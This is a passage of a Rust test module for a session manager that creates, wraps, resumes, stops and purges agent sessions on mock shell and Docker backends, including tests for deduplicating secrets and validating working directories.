req.secrets = Some(vec!["GITHUB_TOKEN".into(), "GH_WORK".into()]);
let result = mgr.create_session(req).await;
let err = result.unwrap_err().to_string();
assert!(err.contains("both map to env var"), "got: {err}");
}
#[tokio::test]
async fn test_create_session_no_command_no_default_falls_back_to_shell() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "no-fallback".into(),
workdir: Some("/tmp".into()),
command: None,
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert!(!session.command.is_empty());
let calls = backend.calls.lock().unwrap();
assert!(calls[0].contains("-l -c"));
drop(calls);
}
#[tokio::test]
async fn test_resume_lost_sessions_resumes_active_with_dead_backend() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
mgr.create_session(make_req("sess-a")).await.unwrap();
*backend.alive.lock().unwrap() = false;
let resumed = mgr.resume_lost_sessions().await.unwrap();
assert_eq!(resumed, 1);
let resume_creates = backend
.calls
.lock()
.unwrap()
.iter()
.filter(|c| c.starts_with("create:"))
.count();
assert_eq!(resume_creates, 2);
}
#[tokio::test]
async fn test_resume_lost_sessions_skips_stopped_sessions() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
mgr.create_session(make_req("stopped-sess")).await.unwrap();
mgr.stop_session("stopped-sess", false).await.unwrap();
*backend.alive.lock().unwrap() = false;
let resumed = mgr.resume_lost_sessions().await.unwrap();
assert_eq!(resumed, 0);
}
#[tokio::test]
async fn test_resume_lost_sessions_skips_alive_sessions() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
mgr.create_session(make_req("alive-sess")).await.unwrap();
let resumed = mgr.resume_lost_sessions().await.unwrap();
assert_eq!(resumed, 0);
}
#[tokio::test]
async fn test_resume_lost_sessions_resumes_idle_sessions() {
let (mgr, backend, _pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("idle-sess")).await.unwrap();
mgr.store()
.update_session_status(&session.id.to_string(), SessionStatus::Idle)
.await
.unwrap();
*backend.alive.lock().unwrap() = false;
let resumed = mgr.resume_lost_sessions().await.unwrap();
assert_eq!(resumed, 1);
*backend.alive.lock().unwrap() = true;
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Active);
}
#[tokio::test]
async fn test_resume_lost_sessions_marks_lost_on_backend_failure() {
let (mgr, _, _pool) =
test_manager(MockBackend::new().with_alive(false).with_create_error()).await;
let session = Session {
id: Uuid::new_v4(),
name: "fail-resume".into(),
workdir: "/tmp".into(),
command: "echo hello".into(),
status: SessionStatus::Active,
backend_session_id: Some("fail-resume".into()),
created_at: Utc::now() - chrono::Duration::hours(1),
..Default::default()
};
mgr.store().insert_session(&session).await.unwrap();
let resumed = mgr.resume_lost_sessions().await.unwrap();
assert_eq!(resumed, 0);
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Lost);
}
#[tokio::test]
async fn test_resume_lost_sessions_returns_zero_when_empty() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let resumed = mgr.resume_lost_sessions().await.unwrap();
assert_eq!(resumed, 0);
}
#[tokio::test]
async fn test_create_session_invalid_workdir() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "bad-dir".to_owned(),
workdir: Some("/nonexistent/path/that/does/not/exist".into()),
command: Some("echo hi".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: None,
target_node: None,
};
let err = mgr.create_session(req).await.unwrap_err();
assert!(
err.to_string().contains("working directory does not exist"),
"{err}"
);
}
#[tokio::test]
async fn test_create_session_docker_skips_workdir_check() {
let docker = Arc::new(MockBackend::new());
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let mgr = SessionManager::new(Arc::new(MockBackend::new()), store, HashMap::new(), None)
.with_docker_backend(docker)
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "docker-bad-dir".to_owned(),
workdir: Some("/nonexistent/container/path".into()),
command: Some("echo hi".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: Some(Runtime::Docker),
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.runtime, Runtime::Docker);
}
#[tokio::test]
async fn test_resume_session_invalid_workdir() {
let (mgr, _, pool) = test_manager(MockBackend::new().with_alive(false)).await;
let session = mgr
.create_session(make_req("resume-bad-dir"))
.await
.unwrap();
let id = session.id.to_string();
sqlx::query("UPDATE sessions SET status = 'lost', workdir = ? WHERE id = ?")
.bind("/nonexistent/path/that/does/not/exist")
.bind(&id)
.execute(&pool)
.await
.unwrap();
let err = mgr.resume_session(&id).await.unwrap_err();
assert!(
err.to_string().contains("working directory does not exist"),
"{err}"
);
}
#[tokio::test]
async fn test_with_docker_backend_routes_docker_sessions() {
let docker = Arc::new(MockBackend::new());
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let main_backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(main_backend.clone(), store, HashMap::new(), None)
.with_docker_backend(docker.clone())
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "docker-test".to_owned(),
workdir: Some("/tmp".into()),
command: Some("echo hi".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: Some(Runtime::Docker),
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
assert_eq!(session.runtime, Runtime::Docker);
assert!(
session
.backend_session_id
.as_deref()
.unwrap()
.starts_with("docker:")
);
let docker_calls: Vec<_> = docker.calls.lock().unwrap().clone();
assert!(
docker_calls.iter().any(|c| c.starts_with("create:")),
"docker backend should handle docker sessions"
);
let main_calls: Vec<_> = main_backend.calls.lock().unwrap().clone();
assert!(
!main_calls.iter().any(|c| c.starts_with("create:")),
"main backend should not handle docker sessions"
);
}
#[tokio::test]
async fn test_docker_no_config_fails() {
let (mgr, _, _pool) = test_manager(MockBackend::new()).await;
let req = CreateSessionRequest {
name: "docker-test".to_owned(),
workdir: Some("/tmp".into()),
command: Some("echo hi".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: Some(Runtime::Docker),
secrets: None,
target_node: None,
};
let err = mgr.create_session(req).await.unwrap_err();
assert!(
err.to_string().contains("docker runtime not configured"),
"{err}"
);
}
#[tokio::test]
async fn test_docker_command_not_wrapped() {
let docker = Arc::new(MockBackend::new());
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let mgr = SessionManager::new(Arc::new(MockBackend::new()), store, HashMap::new(), None)
.with_docker_backend(docker.clone())
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "docker-cmd".to_owned(),
workdir: Some("/tmp".into()),
command: Some("claude".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: Some(Runtime::Docker),
secrets: None,
target_node: None,
};
mgr.create_session(req).await.unwrap();
let calls: Vec<_> = docker.calls.lock().unwrap().clone();
let create_call = calls.iter().find(|c| c.starts_with("create:")).unwrap();
assert!(
!create_call.contains("-l -c"),
"docker command should not be wrapped: {create_call}"
);
assert!(
create_call.contains("claude"),
"docker command should be raw: {create_call}"
);
}
#[tokio::test]
async fn test_stale_grace_period_prevents_early_marking() {
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let backend = Arc::new(MockBackend::new().with_alive(false));
let mgr = SessionManager::new(backend, store, HashMap::new(), None);
let session = mgr.create_session(make_req("young")).await.unwrap();
let fetched = mgr
.get_session(&session.id.to_string())
.await
.unwrap()
.unwrap();
assert_eq!(fetched.status, SessionStatus::Active);
}
#[test]
fn test_cleanup_worktree_nonexistent_path() {
cleanup_worktree("/tmp/nonexistent-worktree-path-for-test", "/tmp");
}
#[test]
fn test_cleanup_worktree_existing_path() {
let tmpdir = tempfile::tempdir().unwrap();
let wt_path = tmpdir
.path()
.join(".pulpo")
.join("worktrees")
.join("test-session");
std::fs::create_dir_all(&wt_path).unwrap();
let wt_str = wt_path.to_str().unwrap();
assert!(wt_path.exists());
cleanup_worktree(wt_str, "/tmp");
assert!(!wt_path.exists());
}
#[tokio::test]
async fn test_stop_session_with_worktree() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("wt-stop")).await.unwrap();
let id = session.id.to_string();
sqlx::query("UPDATE sessions SET worktree_path = ? WHERE id = ?")
.bind("/tmp/nonexistent-wt-stop-test")
.bind(&id)
.execute(&pool)
.await
.unwrap();
mgr.stop_session(&id, false).await.unwrap();
}
#[tokio::test]
async fn test_stop_session_purge_with_worktree() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("wt-purge")).await.unwrap();
let id = session.id.to_string();
sqlx::query("UPDATE sessions SET worktree_path = ? WHERE id = ?")
.bind("/tmp/nonexistent-wt-purge-test")
.bind(&id)
.execute(&pool)
.await
.unwrap();
mgr.stop_session(&id, true).await.unwrap();
let fetched = mgr.get_session(&id).await.unwrap();
assert!(fetched.is_none());
}
#[tokio::test]
async fn test_resume_lost_sessions_docker_command_not_wrapped() {
let docker = Arc::new(MockBackend::new().with_alive(false));
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
let pool = store.pool().clone();
let mgr = SessionManager::new(
Arc::new(MockBackend::new().with_alive(false)),
store,
HashMap::new(),
None,
)
.with_docker_backend(docker.clone())
.with_no_stale_grace();
let req = CreateSessionRequest {
name: "auto-resume-docker".to_owned(),
workdir: Some("/tmp".into()),
command: Some("echo hi".into()),
ink: None,
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: Some(Runtime::Docker),
secrets: None,
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
docker.calls.lock().unwrap().clear();
let resumed = mgr.resume_lost_sessions().await.unwrap();
assert_eq!(resumed, 1);
let calls: Vec<_> = docker.calls.lock().unwrap().clone();
let create_call = calls.iter().find(|c| c.starts_with("create:"));
assert!(
create_call.is_some(),
"docker backend should re-create session"
);
assert!(
!create_call.unwrap().contains("bash -l -c"),
"auto-resumed docker command should not be wrapped"
);
let updated = sqlx::query_as::<_, (String,)>("SELECT status FROM sessions WHERE id = ?")
.bind(session.id.to_string())
.fetch_one(&pool)
.await
.unwrap();
assert_eq!(updated.0, "active");
}
#[test]
fn test_wrap_command_double_quotes() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("echo \"hello world\"", &id, "test", None);
assert!(cmd.contains("echo \"hello world\""));
assert!(cmd.contains("-l -c"));
}
#[test]
fn test_wrap_command_backticks() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("echo `date`", &id, "test", None);
assert!(cmd.contains("echo `date`"));
}
#[test]
fn test_wrap_command_dollar_variables() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("echo $HOME $USER", &id, "test", None);
assert!(cmd.contains("echo $HOME $USER"));
}
#[test]
fn test_wrap_command_empty_string() {
let id = uuid::Uuid::new_v4();
let cmd = wrap_command("", &id, "test", None);
assert!(cmd.contains("-l -c"));
assert!(cmd.contains("[pulpo] Agent exited"));
}
#[test]
fn test_wrap_command_very_long() {
let id = uuid::Uuid::new_v4();
let long_cmd = "echo ".to_owned() + &"a".repeat(10_000);
let cmd = wrap_command(&long_cmd, &id, "test", None);
assert!(cmd.contains(&"a".repeat(10_000)));
assert!(cmd.contains("-l -c"));
}
#[test]
fn test_is_shell_command_with_whitespace() {
assert!(is_shell_command("bash "));
assert!(is_shell_command("/bin/bash "));
}
#[test]
fn test_is_shell_command_bash_with_args_is_not_shell() {
assert!(!is_shell_command("bash -c 'echo hello'"));
}
#[tokio::test]
async fn test_ink_secrets_dedup_with_request_overlap() {
let mut inks = HashMap::new();
inks.insert(
"shared-secrets".into(),
InkConfig {
command: Some("claude".into()),
secrets: vec!["SHARED_SECRET".into(), "INK_ONLY".into()],
..InkConfig::default()
},
);
let tmpdir = tempfile::tempdir().unwrap();
let tmpdir = Box::leak(Box::new(tmpdir));
let store = Store::new(tmpdir.path().to_str().unwrap()).await.unwrap();
store.migrate().await.unwrap();
store
.set_secret("SHARED_SECRET", "shared-val")
.await
.unwrap();
store.set_secret("INK_ONLY", "ink-val").await.unwrap();
store.set_secret("REQ_ONLY", "req-val").await.unwrap();
let backend = Arc::new(MockBackend::new());
let mgr = SessionManager::new(backend, store, inks, None).with_no_stale_grace();
let req = CreateSessionRequest {
name: "dedup-test".into(),
workdir: Some("/tmp".into()),
command: None,
ink: Some("shared-secrets".into()),
description: None,
metadata: None,
idle_threshold_secs: None,
worktree: None,
worktree_base: None,
runtime: None,
secrets: Some(vec!["SHARED_SECRET".into(), "REQ_ONLY".into()]),
target_node: None,
};
let session = mgr.create_session(req).await.unwrap();
let data_dir = mgr.store().data_dir();
let secrets_path = format!("{data_dir}/secrets/secrets-{}.sh", session.id);
let content = std::fs::read_to_string(&secrets_path).unwrap();
let shared_count = content.matches("SHARED_SECRET").count();
assert_eq!(
shared_count, 1,
"SHARED_SECRET should not be duplicated: {content}"
);
assert!(content.contains("INK_ONLY"));
assert!(content.contains("REQ_ONLY"));
}
#[tokio::test]
async fn test_stop_purge_creating_session_succeeds() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let id = session.id.to_string();
sqlx::query("UPDATE sessions SET status = 'creating' WHERE id = ?")
.bind(&id)
.execute(&pool)
.await
.unwrap();
mgr.stop_session(&id, true).await.unwrap();
let fetched = mgr.get_session(&id).await.unwrap();
assert!(fetched.is_none());
}
#[tokio::test]
async fn test_stop_purge_lost_session_succeeds() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let id = session.id.to_string();
sqlx::query("UPDATE sessions SET status = 'lost' WHERE id = ?")
.bind(&id)
.execute(&pool)
.await
.unwrap();
mgr.stop_session(&id, true).await.unwrap();
let fetched = mgr.get_session(&id).await.unwrap();
assert!(fetched.is_none());
}
#[tokio::test]
async fn test_stop_purge_ready_session_succeeds() {
let (mgr, _, pool) = test_manager(MockBackend::new()).await;
let session = mgr.create_session(make_req("test")).await.unwrap();
let id = session.id.to_string();
sqlx::query("UPDATE sessions SET status = 'ready' WHERE id = ?")
.bind(&id)
.execute(&pool)
.await
.unwrap();
mgr.stop_session(&id, true).await.unwrap();
let fetched = mgr.get_session(&id).await.unwrap();
assert!(fetched.is_none());
}
#[tokio::test]
async fn test_resume_session_emits_event() {
let (mgr, _, pool) = test_manager(MockBackend::new().with_alive(false)).await;
let (event_tx, mut event_rx) = broadcast::channel(16);
let mgr = mgr.with_event_tx(event_tx, "test-node".into());
let session = mgr.create_session(make_req("resume-evt")).await.unwrap();
let _ = event_rx.recv().await; let id = session.id.to_string();
sqlx::query("UPDATE sessions SET status = 'lost' WHERE id = ?")
.bind(&id)
.execute(&pool)
.await
.unwrap();
let _resumed = mgr.resume_session(&id).await.unwrap();
let event = event_rx.recv().await.unwrap();
let se = unwrap_session_event(event);
assert_eq!(se.status, "active");
assert_eq!(se.previous_status.as_deref(), Some("lost"));
}
}